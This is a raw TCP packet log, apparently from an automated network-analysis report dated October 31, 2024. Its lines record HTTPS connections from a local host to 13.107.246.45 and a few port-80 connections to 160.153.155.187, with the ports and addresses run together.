                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.610114098 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.610130072 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.610470057 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.610486031 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.612731934 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.612953901 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.612970114 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.613301039 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.613306046 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.614964962 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.615225077 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.615240097 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.615586996 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.615592003 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.706037998 CET4973780192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.710910082 CET8049737160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725250006 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725325108 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725486040 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725672007 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725709915 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725733042 CET51262443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.725739956 CET4435126213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.728946924 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.728972912 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.729063034 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.729269981 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.729279995 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.736991882 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737039089 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737216949 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737485886 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737499952 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737518072 CET51263443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.737523079 CET4435126313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.740147114 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.740190983 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.740287066 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.740425110 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.740442038 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744147062 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744272947 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744329929 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744401932 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744407892 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744420052 CET51264443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.744425058 CET4435126413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.746644974 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.746680021 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.746757984 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.746911049 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.746926069 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.747140884 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748315096 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748370886 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748406887 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748414040 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748431921 CET51261443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.748435974 CET4435126113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.749022961 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.749881983 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.749975920 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750003099 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750003099 CET51260443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750024080 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750036955 CET4435126013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750335932 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750375986 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750443935 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750561953 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.750577927 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.752010107 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.752022028 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.752089024 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.752219915 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:02.752233028 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.488255978 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.495201111 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.496836901 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.500746012 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.513983011 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.533566952 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.549189091 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.549191952 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.549196005 CET4973880192.168.2.4160.153.155.187
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.549272060 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.554089069 CET8049738160.153.155.187192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.564861059 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577174902 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577179909 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577651024 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577655077 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577840090 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.577850103 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578191996 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578198910 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578363895 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578367949 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578686953 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578691959 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578869104 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.578876972 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579193115 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579209089 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579343081 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579355955 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579946041 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.579951048 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.702677011 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.702756882 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.702811956 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.704121113 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.704137087 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.704148054 CET51268443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.704154015 CET4435126813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.704929113 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.705106974 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.705158949 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707053900 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707130909 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707133055 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707200050 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707302094 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707355976 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707462072 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707465887 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707482100 CET51270443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.707485914 CET4435127013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.708337069 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.708337069 CET51267443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.708355904 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.708367109 CET4435126713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.710114002 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.710336924 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.710381031 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.712028980 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.712059021 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.712066889 CET51269443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.712073088 CET4435126913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.714875937 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.714875937 CET51266443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.714889050 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.714898109 CET4435126613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728655100 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728669882 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728693008 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728714943 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728751898 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.728804111 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730077982 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730128050 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730209112 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730644941 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730676889 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.730726957 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731204987 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731230974 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731306076 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731327057 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731390953 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731406927 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731895924 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731920004 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.731973886 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.732034922 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.732047081 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.732122898 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:03.732127905 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.880177021 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.881633997 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882262945 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882294893 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882320881 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882339001 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882797003 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.882810116 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.883048058 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.883055925 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.884306908 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.884692907 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.884715080 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.884752035 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885113001 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885119915 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885313988 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885346889 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885752916 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.885759115 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.888382912 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.890358925 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.890374899 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.890755892 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:04.890762091 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.009622097 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.009677887 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.009815931 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010009050 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010094881 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010118008 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010133028 CET51275443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010138988 CET4435127513.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.010205984 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.011331081 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.011461020 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.011473894 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.011486053 CET51273443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.011490107 CET4435127313.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.013932943 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.013958931 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014018059 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014245987 CET51276443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014256954 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014262915 CET4435127613.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014281988 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014331102 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014514923 CET51277443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.014529943 CET4435127713.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.015104055 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.015913010 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.015983105 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.015983105 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.016007900 CET51271443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.016021013 CET4435127113.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.016730070 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.016894102 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.017049074 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.017103910 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.017113924 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.017138958 CET51272443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.017146111 CET4435127213.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020035028 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020050049 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020129919 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020216942 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020245075 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020262003 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020288944 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020350933 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020503044 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020504951 CET51278443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020517111 CET4435127813.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020625114 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020629883 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020641088 CET51274443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.020644903 CET4435127413.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.021155119 CET51279443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.021167040 CET4435127913.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.022564888 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.022586107 CET4435128013.107.246.45192.168.2.4
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.022653103 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.022824049 CET51280443192.168.2.413.107.246.45
                                                                                                                                                                                                                                                                                                                      Oct 31, 2024 19:20:05.022835016 CET4435128013.107.246.45192.168.2.4
